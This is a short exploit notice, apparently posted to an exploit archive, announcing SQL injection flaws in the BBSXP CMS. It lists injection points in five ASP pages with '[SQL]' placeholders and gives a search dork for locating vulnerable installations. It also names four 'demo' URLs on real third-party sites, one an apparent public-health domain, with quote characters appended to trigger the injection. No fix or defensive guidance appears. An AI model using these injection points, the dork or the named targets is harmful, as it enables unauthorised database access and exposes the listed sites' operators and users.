BBSXP CMS suffers from multiple remote SQL injection vulnerabilities.
1895189dd423c6c71b1b7704ac509706d8f33415f1158c90e87c6e785e07aa28
########################################################################################
# #
# Exploit Title : BBSXP CMS SQL Injection Vulnerability #
# #
# Author : Secure-Land Security Team #
# #
# Discovered By : farbodmahini #
# #
# Home : Secure-Land.net #
# #
# Version : All Version #
# #
# Software Link : http://www.bbsxp.com/download.htm #
# #
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #
# #
# Security Risk : High #
# #
# DorK : "Powered by BBSXP" #
# #
# #
########################################################################################
# #
# Expl0iT: #
# #
# http://[TarGeT]/ShowPost.asp?ThreadID=[SQL] #
# http://[TarGeT]/blog.asp?id=[SQL] #
# http://[TarGeT]/ShowForum.asp?ForumID=[SQL] #
# http://[TarGeT]/Profile.asp?UserName=[SQL] #
# http://[TarGeT]/print.asp?id=[SQL] #
# #
# #
# Demo : #
# #
# http://www.syec.net.cn/bbsxp/print.asp?id=1676' #
# http://www.chinacdc.net/bbsxp/ShowPost.asp?ThreadID=4430' #
# http://www.jhxlzx.cn/bbs/blog.asp?id=3877' #
# http://www.jhxlzx.cn/bbs/ShowForum.asp?ForumID=92' #
# #
########################################################################################
# #
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #
# #
########################################################################################
# #
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #
# #
########################################################################################